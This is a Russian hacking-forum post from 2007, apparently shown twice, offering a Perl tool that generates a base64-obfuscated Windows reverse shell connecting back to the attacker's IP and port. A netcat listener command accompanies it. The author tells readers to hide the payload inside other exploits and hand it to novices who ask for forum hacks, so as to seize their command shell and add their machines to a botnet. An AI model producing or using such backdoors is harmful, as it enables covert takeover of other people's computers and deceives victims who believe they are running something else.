slider
06.03.2007, 15:39
Недавно начал учить перл я, в конечном итоге написал такой релизик...
Сообственно в основе лежит простейший back-connect shell...
Используя NetCat открываем у себя порт например 9999
nc.exe -lvvp 9999
Запускаем скрипт.. и следуем USAGE:
[Parameters] : X:\name.pl IP PORT file
[Example] : X:\name.pl 127.0.0.1 9999 exploit.pl
Передаём все параметры через коммандую строку нашему файлу...
Указываем свой IP адресс и порт.. далее файл в котором сохранится наш скрипт..
а сохраниться он в base64 ... (менее заметно.. и компактней)
Далее втыкаем этот скриптик в любой exploit.. и разумеется даём.. скрипт киддису который упорно просит вас похекать какойнить форум... etc
И.... о .. чудо... вы получили доступ к его cmd, а от cmd и до ftp недолеко...
а там и пополнить ботнет недолго =)...
P.S
Как я и говорил... это не супер релиз а релизик...
и что скрипт работает "без палева" тож трудно сказать...
вообщем юзаем отписываемся...
#!/usr/bin/perl
## C0d3d by slider
## Backdoor Reverse-Shell v1.3
## http://antichat.ru
if (@ARGV!=3)
{
print "\n" . '~' x 56 . "\n";
print "Backdoor Reverse-Shell \n\n";
print "\n" . '~' x 56 . "\n";
print "---USAGE:" .'-' x 47 ."\n\n";
print "[Parameters] : $0 IP PORT file \n";
print "[Example] : $0 127.0.0.1 9999 exploit.pl \n\n";
print '-' x 56 . "\n";
die("\n");
}
print "---USAGE:" .'-' x 47 ."\n\n";
print "[Parameters] : $0 IP PORT file \n";
print "[Example] : $0 127.0.0.1 9999 exploit.pl \n\n";
print '~' x 56 . "\n";
$IP=@ARGV[0];
$PORT=@ARGV[1];
$NAME=@ARGV[2];
$TEXT=
"open logg,\">expl~1.tmp\";".
"print logg \"use IO::Socket;\";".
"print logg \"use Socket; use FileHandle;\";".
"print logg \"socket(SOCKET,PF_INET,SOCK_STREAM, getprotobyname('tcp'));\";".
"print logg \"connect(SOCKET, sockaddr_in('$PORT',inet_aton('$IP')));\";".
"print logg \"SOCKET->autoflush();\";".
"print logg \"open(STDIN,'>&SOCKET');\";".
"print logg \"open(STDOUT,'>&SOCKET');\";".
"print logg \"open(STDERR,'>&SOCKET');\";".
"print logg \"exec('cmd.exe');\";".
"close logg;";
use MIME::Base64;
$encoded = encode_base64($TEXT);
print " Injecting...\n";
open base64,">$NAME";
print base64 "\$payload='$encoded';";
print base64 "use MIME::Base64;";
print base64 "\$decoded = decode_base64(\$payload);";
print base64 "eval(\$decoded);";
print base64 "system(\'start perl expl~1.tmp\');";
print base64 "system(\'del expl~1.tmp\');";
close base64;
print " OK...\n\n";
print "$encoded";
ОБНОВЛЕНО ДО v1.3
Сообственно в основе лежит простейший back-connect shell...
Используя NetCat открываем у себя порт например 9999
nc.exe -lvvp 9999
Запускаем скрипт.. и следуем USAGE:
[Parameters] : X:\name.pl IP PORT file
[Example] : X:\name.pl 127.0.0.1 9999 exploit.pl
Передаём все параметры через коммандую строку нашему файлу...
Указываем свой IP адресс и порт.. далее файл в котором сохранится наш скрипт..
а сохраниться он в base64 ... (менее заметно.. и компактней)
Далее втыкаем этот скриптик в любой exploit.. и разумеется даём.. скрипт киддису который упорно просит вас похекать какойнить форум... etc
И.... о .. чудо... вы получили доступ к его cmd, а от cmd и до ftp недолеко...
а там и пополнить ботнет недолго =)...
P.S
Как я и говорил... это не супер релиз а релизик...
и что скрипт работает "без палева" тож трудно сказать...
вообщем юзаем отписываемся...
#!/usr/bin/perl
## C0d3d by slider
## Backdoor Reverse-Shell v1.3
## http://antichat.ru
if (@ARGV!=3)
{
print "\n" . '~' x 56 . "\n";
print "Backdoor Reverse-Shell \n\n";
print "\n" . '~' x 56 . "\n";
print "---USAGE:" .'-' x 47 ."\n\n";
print "[Parameters] : $0 IP PORT file \n";
print "[Example] : $0 127.0.0.1 9999 exploit.pl \n\n";
print '-' x 56 . "\n";
die("\n");
}
print "---USAGE:" .'-' x 47 ."\n\n";
print "[Parameters] : $0 IP PORT file \n";
print "[Example] : $0 127.0.0.1 9999 exploit.pl \n\n";
print '~' x 56 . "\n";
$IP=@ARGV[0];
$PORT=@ARGV[1];
$NAME=@ARGV[2];
$TEXT=
"open logg,\">expl~1.tmp\";".
"print logg \"use IO::Socket;\";".
"print logg \"use Socket; use FileHandle;\";".
"print logg \"socket(SOCKET,PF_INET,SOCK_STREAM, getprotobyname('tcp'));\";".
"print logg \"connect(SOCKET, sockaddr_in('$PORT',inet_aton('$IP')));\";".
"print logg \"SOCKET->autoflush();\";".
"print logg \"open(STDIN,'>&SOCKET');\";".
"print logg \"open(STDOUT,'>&SOCKET');\";".
"print logg \"open(STDERR,'>&SOCKET');\";".
"print logg \"exec('cmd.exe');\";".
"close logg;";
use MIME::Base64;
$encoded = encode_base64($TEXT);
print " Injecting...\n";
open base64,">$NAME";
print base64 "\$payload='$encoded';";
print base64 "use MIME::Base64;";
print base64 "\$decoded = decode_base64(\$payload);";
print base64 "eval(\$decoded);";
print base64 "system(\'start perl expl~1.tmp\');";
print base64 "system(\'del expl~1.tmp\');";
close base64;
print " OK...\n\n";
print "$encoded";
ОБНОВЛЕНО ДО v1.3